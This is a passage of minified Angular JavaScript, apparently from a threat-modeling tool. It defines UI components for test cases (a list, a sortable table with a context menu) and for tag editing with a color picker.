new(e||t)(Ee(Yi),Ee(Oa))},t.\u0275cmp=Wt({type:t,selectors:[["app-testing"]],inputs:{testing:"testing"},decls:54,vars:25,consts:[[2,"margin","10px"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"float","right",3,"matMenuTriggerFor","matTooltip"],["moreMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["cdkDrag","",3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"column2"],[4,"ngIf"],["appearance","fill",2,"width","100%","margin-top","10px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["cdkDrag","",3,"click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin-left","10px"],[3,"testCase"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"div",2),s(5,"\n      "),m(6,"mat-list",3),he("cdkDropListDropped",function(r){return i.drop(r)}),s(7,"\n        "),m(8,"div",4),s(9),oe(10,"translate"),m(11,"button",5),he("click",function(){return i.AddTestCase()}),oe(12,"translate"),m(13,"mat-icon"),s(14,"add"),u()(),s(15,"\n          "),m(16,"button",6),oe(17,"translate"),m(18,"mat-icon"),s(19,"more_vert"),u()(),s(20,"\n          "),m(21,"mat-menu",null,7),s(23,"\n            "),m(24,"button",8),he("click",function(){return i.ResetNumbers()}),s(25),oe(26,"translate"),u(),s(27,"\n          "),u(),s(28,"\n        "),u(),s(29,"\n        "),ne(30,q0t,18,14,"mat-list-item",9),s(31,"\n      "),u(),s(32,"\n    "),u(),s(33,"\n    "),m(34,"div",10),s(35,"\n      "),ne(36,G0t,7,1,"ng-container",11),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),it(40,"mat-divider"),s(41,"\n  "),m(42,"div"),s(43,"\n    "),m(44,"mat-form-field",12),s(45,"\n      "),m(46,"mat-label"),s(47),oe(48,"translate"),u(),s(49,"\n      "),m(50,"textarea",13),he("ngModelChange",function(r){return i.testing.Description=r}),u(),s(51,"\n    "),u(),s(52,"\n  "),u(),s(53,"\n"),u()),2&e){const n=Ti(22);C(6),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ct("",re(10,15,"general.TestCases"),"\n          "),C(2),at("matTooltip",re(12,17,"general.Add")),C(5),at("matTooltip",re(17,19,"general.More")),V("matMenuTriggerFor",n),C(8),V("disabled",i.testing.TestCases.length<2),C(1),ke(re(26,21,"pages.modeling.threattable.resetNumbers")),C(5),V("ngForOf",i.testing.TestCases),C(6),V("ngIf",i.selectedTestCase),C(11),ke(re(48,23,"general.Notes")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.testing.Description)}},dependencies:[Zi,Ri,an,Ta,Ea,Rd,Sd,oa,da,nn,un,Go,Xa,es,ts,Or,Lr,rc,_p,Xo,qo,po,Pa,gM,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function Q0t(t,a){1&t&&it(0,"mat-progress-spinner",22),2&t&&V("diameter",20)}function $0t(t,a){1&t&&(m(0,"th",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function K0t(t,a){if(1&t&&(m(0,"td",24),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function X0t(t,a){1&t&&(m(0,"th",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function Y0t(t,a){if(1&t&&(m(0,"td",24),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function J0t(t,a){1&t&&(m(0,"th",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function Z0t(t,a){if(1&t&&(m(0,"option",27),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetTestCaseStateName(e)))}}function e1t(t,a){if(1&t){const e=Ye();m(0,"td",24),s(1,"\n          "),m(2,"select",25),he("ngModelChange",function(n){return Me(be(e).$implicit.Status=n)}),s(3,"\n            "),ne(4,Z0t,3,4,"option",26),s(5,"\n          "),u(),s(6,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.Status),C(2),V("ngForOf",i.GetTestCaseStates())}}function t1t(t,a){1&t&&(m(0,"th",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Elements")," "))}function i1t(t,a){if(1&t&&(m(0,"td",24),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetElementNames(e)," ")}}function a1t(t,a){1&t&&(m(0,"th",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Description")," "))}function n1t(t,a){if(1&t&&(m(0,"td",24),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Description," ")}}function o1t(t,a){1&t&&(m(0,"th",28),s(1," "),u())}function r1t(t,a){if(1&t){const e=Ye();m(0,"td",24),s(1," "),m(2,"mat-icon",29),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function s1t(t,a){1&t&&it(0,"tr",30)}function c1t(t,a){if(1&t){const e=Ye();m(0,"tr",31),he("click",function(){const r=be(e).$implicit;return Me(B().SelectTestCase(r))})("dblclick",function(){const r=be(e).$implicit;return Me(B().OpenTestCase(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit;Ct("selected-item",B().IsTestCaseSelected(e)),V("id",e.ID)}}function l1t(t,a){1&t&&(m(0,"tr",32),s(1,"\n        "),m(2,"td",33),s(3),oe(4,"translate"),u(),s(5,"\n      "),u()),2&t&&(C(3),ke(re(4,1,"pages.modeling.testcasetable.noTestCases")))}function d1t(t,a){if(1&t&&(m(0,"span",36),s(1),u()),2&t){const e=B().item;C(1),ke(e.GetProperty("Name"))}}function m1t(t,a){1&t&&(m(0,"span",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}function u1t(t,a){if(1&t){const e=Ye();s(0,"\n        "),ne(1,d1t,2,1,"span",34),s(2," \n        "),ne(3,m1t,3,3,"span",34),s(4,"\n        "),m(5,"button",35),he("click",function(){const r=be(e).item;return Me(B().OpenTestCase(r))}),s(6,"\n          "),m(7,"mat-icon"),s(8,"edit"),u(),s(9,"\n          "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n        "),u(),s(14," \n        "),m(15,"button",35),he("click",function(){const r=be(e).item;return Me(B().DeleteTestCase(r))}),s(16,"\n          "),m(17,"mat-icon"),s(18,"delete"),u(),s(19,"\n          "),m(20,"span"),s(21),oe(22,"translate"),u(),s(23,"\n        "),u(),s(24,"\n      ")}if(2&t){const e=a.item;C(1),V("ngIf",e),C(2),V("ngIf",!e),C(2),V("disabled",!e),C(6),ke(re(12,6,"pages.modeling.threattable.editEntry")),C(4),V("disabled",!e),C(6),ke(re(22,8,"pages.modeling.threattable.deleteEntry"))}}let h1t=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.dialog=n,this.changesCounter=0,this.isCalculatingTestCases=!1,this._testCases=[],this.autoRefreshTestCases=!0,this.displayedColumns=["number","name","status","elements","description","more"],this.selectedObjectChanged=new Tt,this.testCaseCountChanged=new Tt,this.menuTopLeftPosition={x:"0",y:"0"};const r=()=>{0==this.changesCounter?setTimeout(()=>{this.isCalculatingTestCases=!0,this.changesCounter++},10):this.changesCounter++,setTimeout(()=>{this.changesCounter--,0==this.changesCounter&&this.RefreshTestCases()},3e3)};this.dataService.Project&&setTimeout(()=>{var c;null===(c=this.dataService.Project)||void 0===c||c.TestCasesChanged.subscribe(d=>r())},1e3)}get refreshingTestCases(){return this.changesCounter>0||this.isCalculatingTestCases}get selectedTestCase(){return this._selectedTestCase}set selectedTestCase(e){this._selectedTestCase=e}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.RefreshTestCases()}get selectedObject(){return this._selectedObject}set selectedObject(e){var i;e&&(null===(i=this._selectedObject)||void 0===i?void 0:i.ID)==e.ID||(this._selectedObject=e)}set filteredObject(e){this._filteredObject=e,this.RefreshTestCases()}get TestCases(){return this._testCases}set TestCases(e){this._filteredObject&&(e=e.filter(i=>i.LinkedElements.includes(this._filteredObject))),this._testCases=e,this.dataSource=new Ld(e),this.dataSource.sort=this.sort,this.dataSource.sortingDataAccessor=(i,n)=>"number"==n?Number(i.Number):"name"==n?i.Name:"status"==n?i.Status:"elements"==n?this.GetElementNames(i):"description"==n?i.Description:void console.error("Missing sorting header"),this.sort&&this.sort.sortChange.emit(this.sort)}ngOnInit(){}onKeyDown(e){var i;if(this.isActive&&"TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedTestCase){const n=(r,c)=>{this.SelectTestCase(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSource.sortData(this.dataSource.filteredData,this.sort),c=r.indexOf(this.selectedTestCase);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){const r=this.dataSource.sortData(this.dataSource.filteredData,this.sort),c=r.indexOf(this.selectedTestCase);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}RefreshTestCases(){setTimeout(()=>{var e;this.TestCases=[],!(null===(e=this._selectedNode)||void 0===e)&&e.data&&(this.TestCases=this.dataService.Project.GetTestCases().filter(i=>this.GetElements(i).length>0)),this.testCaseCountChanged.emit(this.TestCases.length),this.isCalculatingTestCases=!1},10)}SelectTestCase(e){this.selectedTestCase=e;const i=this.GetElements(e);(null==i?void 0:i.length)>0&&this.selectedObjectChanged.emit(i[0])}OpenTestCase(e){this.dialog.OpenTestCaseDialog(e,!1,this.dataSource.sortData(this.dataSource.filteredData,this.sort))}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}DeleteTestCase(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Project.DeleteTestCase(e),this.RefreshTestCases())})}GetElements(e){return e.LinkedElements.filter(i=>{var n,r;return(null===(r=null===(n=this.selectedNode)||void 0===n?void 0:n.data)||void 0===r?void 0:r.ID)==e.GetViewOfLinkedElement(i).ID})}GetElementNames(e){return this.GetElements(e).map(i=>i.Name).join(", ")}IsTestCaseSelected(e){return this.selectedTestCase==e}IsElementSelected(e){return e&&this.selectedObject&&this.GetElements(e).includes(this.selectedObject)}GetTestCaseStates(){return $g.GetKeys()}GetTestCaseStateName(e){return $g.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-test-case-table"]],viewQuery:function(e,i){if(1&e&&(Mi(il,5),Mi(po,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{isActive:"isActive",selectedNode:"selectedNode",selectedObject:"selectedObject",filteredObject:"filteredObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",testCaseCountChanged:"testCaseCountChanged"},decls:83,vars:22,consts:[[2,"height","100%","display","grid","align-content","start"],[1,"tools"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["style","display: inline; vertical-align: super; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","number","matSortDirection","asc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","name"],["matColumnDef","status"],["matColumnDef","elements"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","description"],["matColumnDef","more"],["mat-header-cell","",4,"matHeaderCellDef"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mode","indeterminate",2,"display","inline","vertical-align","super","margin-left","5px",3,"diameter"],["mat-header-cell","","mat-sort-header",""],["mat-cell",""],[2,"width","140px",3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["mat-header-cell",""],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","5",1,"mat-cell"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"button",2),he("click",function(){return i.RefreshTestCases()}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon"),s(8,"refresh"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",2),he("click",function(){return i.autoRefreshTestCases=!i.autoRefreshTestCases}),oe(12,"translate"),s(13,"\n      "),m(14,"mat-icon"),s(15,"autorenew"),u(),s(16,"\n    "),u(),s(17,"\n    "),ne(18,Q0t,1,1,"mat-progress-spinner",3),s(19,"\n  "),u(),s(20,"\n  "),m(21,"div",4),s(22,"\n    "),m(23,"table",5),s(24,"\n      "),bt(25,6),s(26,"\n        "),ne(27,$0t,3,3,"th",7),s(28,"\n        "),ne(29,K0t,2,1,"td",8),s(30,"\n      "),Mt(),s(31,"\n      "),bt(32,9),s(33,"\n        "),ne(34,X0t,3,3,"th",7),s(35,"\n        "),ne(36,Y0t,2,1,"td",8),s(37,"\n      "),Mt(),s(38,"\n      "),bt(39,10),s(40,"\n        "),ne(41,J0t,3,3,"th",7),s(42,"\n        "),ne(43,e1t,7,2,"td",8),s(44,"\n      "),Mt(),s(45,"\n      "),bt(46,11),s(47,"\n        "),ne(48,t1t,3,3,"th",7),s(49,"\n        "),ne(50,i1t,2,3,"td",12),s(51,"\n      "),Mt(),s(52,"\n      "),bt(53,13),s(54,"\n        "),ne(55,a1t,3,3,"th",7),s(56,"\n        "),ne(57,n1t,2,1,"td",8),s(58,"\n      "),Mt(),s(59,"\n      "),bt(60,14),s(61,"\n        "),ne(62,o1t,2,0,"th",15),s(63,"\n        "),ne(64,r1t,6,3,"td",8),s(65,"\n      "),Mt(),s(66,"\n  \n      "),ne(67,s1t,1,0,"tr",16),s(68,"\n      "),ne(69,c1t,2,3,"tr",17),s(70,"\n      "),ne(71,l1t,6,3,"tr",18),s(72,"\n    "),u(),s(73,"\n    "),it(74,"div",19),s(75," \n    "),m(76,"mat-menu",null,20),s(78," \n      "),ne(79,u1t,25,10,"ng-template",21),s(80," \n    "),u(),s(81," \n  "),u(),s(82,"\n"),u()),2&e){const n=Ti(77);C(4),at("matTooltip",re(5,18,"general.Refresh")),C(7),Ct("toolBtn-Selected",i.autoRefreshTestCases),at("matTooltip",re(12,20,"pages.modeling.threattable.autoRefresh")),C(7),V("ngIf",i.refreshingTestCases),C(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSource),C(44),V("matHeaderRowDef",i.displayedColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedColumns),C(5),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,pm,_m,Td,Ta,Ea,oa,da,wl,Xo,qo,po,Zc,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,yp,il,Mp,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();const f1t=["tagInput"],p1t=function(t){return{"background-color":t}};function _1t(t,a){if(1&t){const e=Ye();m(0,"mat-chip",9),he("removed",function(){const r=be(e).$implicit;return Me(B(2).RemoveTag(r))})("click",function(){be(e);const n=Ti(11);return Me(B(2).OnChipClick(n))}),s(1),m(2,"button",10),s(3,"\n        "),m(4,"mat-icon"),s(5,"cancel"),u(),s(6,"\n      "),u(),s(7,"\n      "),m(8,"input",11),he("ngModelChange",function(n){return Me(be(e).$implicit.ColorPicker=n)}),u(),s(9,"\n      "),it(10,"ngx-mat-color-picker",12,13),s(12,"\n    "),u()}if(2&t){const e=a.$implicit,i=Ti(11);V("ngStyle",fr(5,p1t,e.Color)),C(1),ct("\n      ",e.Name,"\n      "),C(7),V("ngxMatColorPicker",i)("ngModel",e.ColorPicker),C(2),V("color","primary")}}function g1t(t,a){if(1&t){const e=Ye();m(0,"mat-option",14),s(1,"\n      "),m(2,"mat-icon",15),s(3,"circle"),u(),s(4),m(5,"button",16),he("click",function(n){const c=be(e).$implicit;return Me(B(2).DeleteTag(c,n))}),s(6,"\n        "),m(7,"mat-icon"),s(8,"delete"),u(),s(9,"\n      "),u(),s(10,"\n      "),m(11,"button",16),he("click",function(n){const c=be(e).$implicit;return Me(B(2).EditTag(c,n))}),s(12,"\n        "),m(13,"mat-icon"),s(14,"edit"),u(),s(15,"\n      "),u(),s(16,"\n      "),m(17,"button",16),he("click",function(n){const c=be(e).$implicit;return Me(B(2).TagDown(c,n))}),s(18,"\n        "),m(19,"mat-icon"),s(20,"arrow_downward"),u(),s(21,"\n      "),u(),s(22,"\n      "),m(23,"button",16),he("click",function(n){const c=be(e).$implicit;return Me(B(2).TagUp(c,n))}),s(24,"\n        "),m(25,"mat-icon"),s(26,"arrow_upward"),u(),s(27,"\n      "),u(),s(28,"\n    "),u()}if(2&t){const e=a.$implicit;V("value",e),C(2),ri("color",e.Color),C(2),ct("\n      ",e.Name,"\n      ")}}function C1t(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",1),s(1,"\n  "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n  "),m(6,"mat-chip-list",null,2),s(8,"\n    "),ne(9,_1t,13,7,"mat-chip",3),s(10,"\n    "),m(11,"input",4,5),he("matChipInputTokenEnd",function(n){return be(e),Me(B().AddTag(n))}),oe(13,"translate"),u(),s(14,"\n  "),u(),s(15,"\n  "),m(16,"mat-autocomplete",6,7),he("optionSelected",function(n){return be(e),Me(B().SelectedTag(n))}),s(18,"\n    "),ne(19,g1t,29,4,"mat-option",8),oe(20,"async"),s(21,"\n  "),u(),s(22,"\n"),u()}if(2&t){const e=Ti(7),i=Ti(17),n=B();C(3),ke(re(4,8,"general.Tags")),C(6),V("ngForOf",n.tagableElement.MyTags),C(2),at("placeholder",re(13,10,"properties.newTag")),V("formControl",n.tagCtrl)("matAutocomplete",i)("matChipInputFor",e)("matChipInputSeparatorKeyCodes",n.separatorKeysCodes),C(8),V("ngForOf",re(20,12,n.filteredTags))}}let RZ=(()=>{class t{constructor(e,i){this.dataService=e,this.dialog=i,this.separatorKeysCodes=[13,188],this.tagCtrl=new lu(""),this.colorCtr=new lu(new Pp(255,243,0)),this.filteredTags=this.tagCtrl.valueChanges.pipe(Ro(null),Xe(n=>n?this._filterTag(n):this.dataService.Project.GetMyTags().slice()))}ngOnInit(){}AddTag(e){const i=(e.value||"").trim();if(i)if(this.dataService.Project.GetMyTags().map(n=>n.Name).includes(i))this.tagableElement.AddMyTag(this.dataService.Project.GetMyTags().find(n=>n.Name==i));else{const n=this.dataService.Project.CreateMyTag();n.Name=i,this.tagableElement.AddMyTag(n)}e.chipInput.clear(),this.tagCtrl.setValue(null)}RemoveTag(e){this.tagableElement.RemoveMyTag(e.ID)}DeleteTag(e,i){this.dialog.OpenDeleteObjectDialog(e).subscribe(n=>{n&&(this.dataService.Project.DeleteMyTag(e),this.tagCtrl.setValue(null))}),i.stopPropagation()}EditTag(e,i){this.dialog.OpenRenameDialog(e,e.GetProperties().find(n=>"Name"==n.ID)),i.stopPropagation()}TagDown(e,i){const n=this.dataService.Project.GetMyTags(),r=n.indexOf(e);r!=n.length-1&&Qs(n,r,r+1),this.filteredTags=this.tagCtrl.valueChanges.pipe(Ro(null),Xe(c=>c?this._filterTag(c):this.dataService.Project.GetMyTags().slice())),i.stopPropagation()}TagUp(e,i){const n=this.dataService.Project.GetMyTags(),r=n.indexOf(e);0!=r&&Qs(n,r,r-1),this.filteredTags=this.tagCtrl.valueChanges.pipe(Ro(null),Xe(c=>c?this._filterTag(c):this.dataService.Project.GetMyTags().slice())),i.stopPropagation()}SelectedTag(e){this.tagableElement.AddMyTag(e.option.value),this.tagInput.nativeElement.value="",this.tagCtrl.setValue(null)}OnChipClick(e){e.open()}_filterTag(e){let i="";return i=e instanceof pM?e.Name.toLowerCase():e.toLowerCase(),this.dataService.Project.GetMyTags().filter(n=>n.Name.toLowerCase().includes(i))}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-tags"]],viewQuery:function(e,i){if(1&e&&Mi(f1t,5),2&e){let n;Vt(n=Bt())&&(i.tagInput=n.first)}},inputs:{tagableElement:"tagableElement"},decls:1,vars:1,consts:[["style","width: 100%;","appearance","fill",4,"ngIf"],["appearance","fill",2,"width","100%"],["chipList",""],["selected","",3,"ngStyle","removed","click",4,"ngFor","ngForOf"],[3,"placeholder","formControl","matAutocomplete","matChipInputFor","matChipInputSeparatorKeyCodes","matChipInputTokenEnd"],["tagInput",""],[3,"optionSelected"],["auto","matAutocomplete"],[3,"value",4,"ngFor","ngForOf"],["selected","",3,"ngStyle","removed","click"],["matChipRemove",""],["matInput","","type","color",2,"width","0px","visibility","hidden",3,"ngxMatColorPicker","ngModel","ngModelChange"],[3,"color"],["picker",""],[3,"value"],[2,"margin-right","5px"],["mat-icon-button","",2,"float","right",3,"click"]],template:function(e,i){1&e&&ne(0,C1t,23,14,"mat-form-field",0),2&e&&V("ngIf",i.tagableElement)},dependencies:[Zi,Ri,Yv,an,Ta,Ea,N4,a5,sxe,oa,da,nn,un,yr,Xa,m8,db,VF,WF,D2e,vV,Jv,Xi]}),t})(),k7=(()=>{class t{}return t.\u0275fac=function(e){return 